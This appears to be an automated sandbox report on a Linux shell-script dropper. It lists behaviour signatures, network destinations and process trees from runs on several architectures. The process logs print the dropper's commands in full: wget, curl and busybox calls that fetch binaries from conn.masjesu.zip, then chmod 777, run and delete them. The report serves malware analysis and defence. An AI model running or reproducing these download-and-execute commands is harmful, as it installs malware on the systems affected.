Analysis Overview
SHA256
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
Threat Level: Shows suspicious behavior
The file b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:39
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-mipsel-20240729-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/chmod
[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/rm
[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.3:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:39
Reported
2024-10-21 01:41
Platform
debian9-mipsbe-20240611-en
Max time kernel
146s
Max time network
148s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
Processes
/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/chmod
[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/bin/rm
[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/chmod
[chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW
[./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/bin/rm
[rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/chmod
[chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW
[./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/bin/rm
[rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/chmod
[chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst
[./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/bin/rm
[rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/chmod
[chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI
[./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/bin/rm
[rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/chmod
[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/bin/rm
[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI